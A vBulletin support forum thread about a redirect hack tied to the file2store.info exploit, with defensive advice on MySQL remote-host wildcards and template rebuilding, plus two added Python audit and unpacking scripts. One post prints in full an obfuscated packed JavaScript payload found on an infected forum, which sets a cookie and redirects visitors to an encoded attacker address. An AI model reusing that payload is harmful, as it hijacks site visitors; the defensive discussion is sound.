vBulletin 3.x and 4.x Redirect Security Exploit

This topic is closed.
  • Ramsesx
    Senior Member
    • Aug 2005
    • 3254
    • 3.8.x

    Originally posted by Paul M
    By "participated" you mean I made one post, which was a question. That doesn't mean I'm suddenly aware of a sitemap exploit.

    JFYI, a few posts down, Mert posted "I am sorry but we are talking about vBSEO product not sitemap generator.".
    Yeah that's right, but the site-map exploit was mentioned by Andreas in this topic and because of this Mert added a PL1 update at vb.org, and you're right, "participation" doesn't imply you've read all posts regarding this issue
    .......

    Comment

    • Paul M
      Former Lead Developer
      vB.Com & vB.Org
      • Sep 2004
      • 9886

      After reading Mert's reply to my question, I never returned to that thread until tonight.
      Baby, I was born this way

      Comment

      • Lee G
        Senior Member
        • Jun 2006
        • 290
        • 3.8.x

        The release Mert mentioned is shown as vbseo_sitemap-3-0_PL1 on the zip file
        Seems my own problem with the sitemap errors was down to not setting vbseo to kill non-English characters in the urls
        Fat fingered user error on that one

        I know there has also been another pr update this week which can affect traffic for a few days

        Comment

        • ComputerNinja
          New Member
          • Oct 2005
          • 24

          Originally posted by Jason Dunn
          I'm curious, is there anyone out there getting hit by the file2store.info exploit that does NOT have vbSEO installed? It looks like this is 100% on vbSEO to fix, but maybe I'm wrong about that...
          Hey Jason, long time...

          I removed vbSEO and installed vBulletin CLEAN on June 29. I'm still getting this redirect issue. My traffic went from 800 visits/day last July, crushing my site's pagerank, traffic, etc., to 40-80, and it's remained that way ever since.

          I don't know if this is it, but I used Charles to check the response when going to my site and it returned this:

          Code:
          <html><head></head><body><script type="text/javascript">var vbsp='A0620CB8';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('t a=["\\z\\b\\c\\n\\e\\j\\b","\\k\\b\\c\\n\\e\\j\\b","\\A\\x\\b\\L\\f\\e\\p\\b\\k\\i","\\c\\d\\K\\M\\n\\N\\c\\p\\e\\o\\z","\\q\\d\\d\\J\\e\\b","\\i","\\A\\x\\f\\s\\c\\l\\i\\g","\\D\\F\\k\\f","\\G","\\r\\d\\q\\s\\c\\e\\d\\o","\\l\\c\\c\\f\\H\\g\\g\\j\\P\\Q\\e\\r\\b\\k\\c\\d\\p\\b\\B\\q\\d\\j\\g\\m\\d\\R\\o\\r\\d\\s\\m\\B\\f\\l\\f\\S\\e\\m\\i"];E y(u,C){t h=I O();h[a[1]](h[a[0]]()+T);t w=a[2]+h[a[3]]();v[a[4]]=u+a[5]+C+w+a[6]};y(a[7],a[8]);v[a[9]]=a[U]+V;',58,58,'||||||||||_0x987b|x65|x74|x6F|x69|x70|x2F|_0x414cx4|x3D|x6D|x73|x68|x64|x54|x6E|x72|x63|x6C|x61|var|_0x414cx2|document|_0x414cx5|x20|ipbcc|x67|x3B|x2E|_0x414cx3|x76|function|x62|x31|x3A|new|x6B|x47|x78|x4D|x53|Date|x79|x66|x77|x3F|86400000|10|vbsp'.split('|'),0,{}))</script></body></html>
          I'm unsure if that is the culprit. I could not find that code anywhere in my database dump nor my files.

          Comment

          • iacas
            Member
            • Jan 2005
            • 43
            • 4.0.x

            Edit: feel free to remove this post. Posted in the wrong place. My apologies.
            Erik J. Barzeski

            Comment

            • djbaxter
              Senior Member
              • Aug 2006
              • 1418
              • 4.2.5

              With the help of the security people at RealWebHost.net, we have now positively identified the method for injecting this exploit as well as specific vulnerabilities that permitted it on a 3.83, since updated to 3.87 PL2: As it turns out, it was a server configuration and security issue combined with some specific attributes of vBulletin installations which gave the intruder direct access to the MySQL database.

              The key is first to check your settings in cPanel for Remote MySQL: Unless you are using a database on a remote server, i.e., NOT on localhost, this setting should say "There are no additional MySQL access hosts configured". If you have a specific database intentionally enabled, that too is okay. What should NEVER be there is the character % - this is a wildcard which allows ALL other servers to connect to the database. If you see the wildcard enabled, DELETE IT.

              Then, make sure you change your passwords to strong passwords for both cPanel and MySQL to ensure that no one can change this setting back without your knowledge.

              Then, pick any add-on, disable it, then re-enable it to clear the datastore.

              Finally, download the file tool_reparse.php from http://www.vbulletin.org/forum/showthread.php?t=220967 and let it find discrepancies in your compiled templates and rebuild them.
              Last edited by djbaxter; Sun 17 Jul '11, 2:19pm.
              Psychlinks Web Services Affordable Web Design & Site Management
              Specializing in Small Businesses and vBulletin/Xenforo Forums

              Comment
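An added audit script (written for this page, not code from the thread or from cPanel) that applies the rule djbaxter gives above: when vBulletin is configured for MySQL on localhost, no remote access host is needed at all, and a % wildcard should never be present. It assumes the account list was exported from mysql.user, which is where cPanel's Remote MySQL entries end up, and uses constructed placeholder rows and a constructed config.php excerpt.

```python
import re

# Constructed sample rows in the shape of SELECT user, host FROM mysql.user
# (placeholder values, not taken from any real server).
SAMPLE_GRANTS = [
    ("forum", "localhost"),
    ("forum", "192.168.1.%"),    # subnet wildcard of the kind Lee G found
    ("forum", "203.0.113.45"),   # one remote host (constructed TEST-NET address)
    ("root", "%"),               # bare wildcard: every host on the internet may connect
]

# Constructed excerpt of vBulletin's includes/config.php (placeholder value).
SAMPLE_CONFIG = "$config['MasterServer']['servername'] = 'localhost';\n"

LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}

def configured_db_host(config_text):
    """MasterServer host from a config.php excerpt; 'localhost' when not set."""
    m = re.search(r"\['MasterServer'\]\['servername'\]\s*=\s*'([^']*)'", config_text)
    return m.group(1) if m else "localhost"

def classify_host(host, expected_remote):
    """Verdict for one account host value: ok, wildcard or remote."""
    if host in LOCAL_HOSTS:
        return "ok"
    if "%" in host or "_" in host:        # MySQL treats both as LIKE wildcards
        return "wildcard"
    if host == expected_remote:
        return "ok"                       # the one remote DB server the forum really uses
    return "remote"

def audit(grants, config_text):
    """(user, host, verdict) for every grant that is not plainly needed."""
    db_host = configured_db_host(config_text)
    expected_remote = None if db_host in LOCAL_HOSTS else db_host
    findings = []
    for user, host in grants:
        verdict = classify_host(host, expected_remote)
        if verdict != "ok":
            findings.append((user, host, verdict))
    return findings

if __name__ == "__main__":
    for user, host, verdict in audit(SAMPLE_GRANTS, SAMPLE_CONFIG):
        print(f"{verdict:9} {user}@'{host}'  <- review or delete")
```

A "remote" verdict for a host that is genuinely your separate database server is expected; everything else in the output is the list djbaxter says to delete.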

              • Lee G
                Senior Member
                • Jun 2006
                • 290
                • 3.8.x

                Cheers for that.
                1am in the morning here and I have just seen this. I'm now in the process of having kittens
                Did the database check and found two entries
                192.168.1.%
                88.148.9.210

                Can I just kill those two entries, or is the localhost one with the wildcard % something to worry about deleting?

                Thanks for all the hard work and persistence in finding the solution to this


                Comment

                • djbaxter
                  Senior Member
                  • Aug 2006
                  • 1418
                  • 4.2.5

                  Originally posted by Lee G
                  Cheers for that.
                  1am in the morning here and I have just seen this. I'm now in the process of having kittens
                  Did the database check and found two entries
                  192.168.1.%
                  88.148.9.210

                  Can I just kill those two entries, or is the localhost one with the wildcard % something to worry about deleting?

                  Thanks for all the hard work and persistence in finding the solution to this

                  As far as I know, if you are only using the local MySQL, you shouldn't need ANYTHING listed in MySQL Remote. I own two forums and Admin three others - none of them have any entries under MySQL Remote and they are working just fine. I would delete them both. If you have to, you can always add one of them back.
                  Psychlinks Web Services Affordable Web Design & Site Management
                  Specializing in Small Businesses and vBulletin/Xenforo Forums

                  Comment

                  • Lee G
                    Senior Member
                    • Jun 2006
                    • 290
                    • 3.8.x

                    Cheers for that.
                    I took the brave approach. Checked another cpanel and database I have set up on my server.
                    And it showed exactly as you said.
                    Killed both the above without any adverse effect apart from the forums seeming to speed up on page loads
                    Top man.

                    Comment

                    • Lee G
                      Senior Member
                      • Jun 2006
                      • 290
                      • 3.8.x

                      I was having my second litter of kittens when I checked my cpanel today and found 192.168.1.% had returned

                      I have been in touch with my server techs and this is the reply they gave, which also clarifies the % wild card hacking

                      That is part of the MySQL server by default.

                      Because you can use IP wildcard values in host values (for example, '192.168.1.%' to match every host on a subnet), someone could try to exploit this capability by naming a host 192.168.1.somewhere.com. To foil such attempts, MySQL disallows matching on host names that start with digits and a dot. Thus, if you have a host named something like 1.2.example.com, its name never matches the host part of account names. An IP wildcard value can match only IP numbers, not host names.

                      Comment

                      • djbaxter
                        Senior Member
                        • Aug 2006
                        • 1418
                        • 4.2.5

                        Originally posted by Lee G
                        I was having my second litter of kittens when I checked my cpanel today and found 192.168.1.% had returned

                        I have been in touch with my server techs and this is the reply they gave, which also clarifies the % wild card hacking


                        That is part of the MySQL server by default.

                        Because you can use IP wildcard values in host values (for example, '192.168.1.%' to match every host on a subnet), someone could try to exploit this capability by naming a host 192.168.1.somewhere.com. To foil such attempts, MySQL disallows matching on host names that start with digits and a dot. Thus, if you have a host named something like 1.2.example.com, its name never matches the host part of account names. An IP wildcard value can match only IP numbers, not host names.
                        But it doesn't really clarify it at all. I have a dedicated server with something like 10 databases running over several sites. NONE of them have any entries in MySQL Remote at all. cPanel does not create those entries by default when you set up a database and if you are running sites using MySQL on localhost you do NOT need anything entered in MySQL Remote. Indeed, anything entered in MySQL Remote should be considered suspicious by default unless you are actually using remote databases (i.e., databases on a separate server).
                        Psychlinks Web Services Affordable Web Design & Site Management
                        Specializing in Small Businesses and vBulletin/Xenforo Forums

                        Comment

                        • Lee G
                          Senior Member
                          • Jun 2006
                          • 290
                          • 3.8.x

                          The cpanel glitch I have is mentioned on the cpanel support forum

                          Seems like others have experienced the return of 192.168.1.% after they have deleted it
                          It doesn't make what's happening right.

                          Comment

                          • Lee G
                            Senior Member
                            • Jun 2006
                            • 290
                            • 3.8.x

                            Looks like I got hit twice in twenty minutes tonight

                            Had two blank emails turn up twenty minutes apart, using the Check 4 Hack mod

                            Location of injections reported: pluginlist

                            Comment

                            • djbaxter
                              Senior Member
                              • Aug 2006
                              • 1418
                              • 4.2.5

                              To reiterate, you can erase it temporarily by disabling and then re-enabling any product but the key is to figure out how the bastard is getting in.

                              Have you changed your passwords, especially for cPanel and phpMyAdmin? Is your AdminCP folder password protected? Do you have

                              Code:
                              Options All -Indexes
                              in the .htaccess file in your root? Have you removed all entries from MySQL Remote?

                              What version of vBulletin are you running again?
                              Psychlinks Web Services Affordable Web Design & Site Management
                              Specializing in Small Businesses and vBulletin/Xenforo Forums

                              Comment
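An added example, written for this page and not code from the thread or from the Check 4 Hack mod, of what a check like the one Lee G used can do once it finds script in a datastore row such as pluginlist: it recognises the eval(function(p,a,c,k,e,d)...) packer used by the script ComputerNinja pasted, unpacks it, and reports the redirect markers in the clear text, which is the evidence to keep before the disable/re-enable step djbaxter describes wipes the row. The datastore rows and the packed sample are constructed placeholders.

```python
import re

# Constructed sample: a packed script shaped like the one pasted earlier in the
# thread, with placeholder words and an invalid domain (not a real payload).
PACKED = ("eval(function(p,a,c,k,e,d){/* packer body omitted in this sample */return p}"
          "('0.1=\"2\"+3;',58,4,'document|location|http://example.invalid/?id=|vbsp'"
          ".split('|'),0,{}))")

# Constructed rows in the shape of SELECT title, data FROM datastore (a real
# pluginlist row is a serialized PHP array; simplified here).
SAMPLE_ROWS = [
    ("options", 'a:1:{s:7:"bbtitle";s:5:"Forum";}'),
    ("pluginlist", "<script>" + PACKED + "</script>"),
]

PACKER_RE = re.compile(
    r"eval\(function\(p,a,c,k,e,d\)\{.*?\}\('(?P<p>.*?)',(?P<a>\d+),(?P<c>\d+),"
    r"'(?P<k>.*?)'\.split\('\|'\),0,\{\}\)\)", re.DOTALL)
ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyz"
REDIRECT_MARKERS = ("document.location", "window.location", "document.cookie")

def encode_word(i, a):
    """The packer's token for dictionary index i: base-a digits over 0-9, a-z, A-Z."""
    head = "" if i < a else encode_word(i // a, a)
    i %= a
    return head + (chr(i + 29) if i > 35 else ALPHABET[i])

def unpack(p, a, c, k):
    """Reverse the packer: swap each encoded token for its word (unknown tokens stay)."""
    table = {encode_word(i, a): k[i] for i in range(min(c, len(k))) if k[i]}
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), p, flags=re.ASCII)

def unpack_all(text):
    """Replace every packer call in text with its unpacked source."""
    return PACKER_RE.sub(
        lambda m: unpack(m["p"], int(m["a"]), int(m["c"]), m["k"].split("|")), text)

def scan_datastore(rows):
    """{title: {'unpacked': ..., 'markers': [...]}} for rows carrying a script or packer."""
    findings = {}
    for title, data in rows:
        if "<script" in data or "eval(function(p,a,c,k,e,d)" in data:
            clear = unpack_all(data)
            findings[title] = {"unpacked": clear,
                               "markers": [m for m in REDIRECT_MARKERS if m in clear]}
    return findings

if __name__ == "__main__":
    for title, f in scan_datastore(SAMPLE_ROWS).items():
        print(title, f["markers"])
```

The unpacked text of a real sample like the one in the thread still holds its strings as \xHH escapes; codecs.decode(s, "unicode_escape") on each quoted string turns those into readable words before looking for the markers.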

                              • Lee G
                                Senior Member
                                • Jun 2006
                                • 290
                                • 3.8.x

                                Looks like it might have been a false positive this time
                                As soon as I added the evolve chat bar, the errors came in

                                Uninstalled the bar, ran the test and the warnings went
                                I'm not taking any chances on this one

                                Touch wood, my remote access on the database has not come back

                                Comment
